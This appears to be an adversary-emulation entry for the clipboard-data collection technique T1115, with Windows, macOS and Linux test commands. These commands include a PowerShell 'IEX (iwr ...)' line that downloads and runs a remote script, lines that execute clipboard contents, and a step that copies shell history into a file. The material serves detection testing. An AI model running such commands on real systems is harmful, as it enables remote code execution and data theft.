Adversaries may collect data stored in the clipboard from users copying information within or between applications. For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard. Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation). macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.
dir | clip echo "T1115" > %temp%\T1115.txt clip < %temp%\T1115.txt
echo Get-Process | clip Get-Clipboard | iex
echo ifconfig | pbcopy $(pbpaste)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
apt install xclip -y history | tail -n 30 | xclip -sel clip xclip -o > history.txt
pbpaste